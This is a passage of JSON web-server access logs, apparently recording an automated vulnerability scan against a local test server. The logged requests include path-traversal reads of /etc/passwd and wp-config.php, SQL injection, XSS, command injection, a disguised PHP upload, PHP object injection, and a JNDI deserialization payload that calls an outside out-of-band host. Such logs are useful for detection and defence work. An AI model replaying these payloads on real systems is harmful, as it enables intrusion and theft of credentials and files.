HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /EMSWebClient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2u0eosmpv1jhs80ca0eurw4u5ofs6d5.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/28 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn_logon.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x2229N5m9Dq7CEps7aIVblFCO4ud19.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=&action=edit&f1=.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./etc/passwd&restore=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) 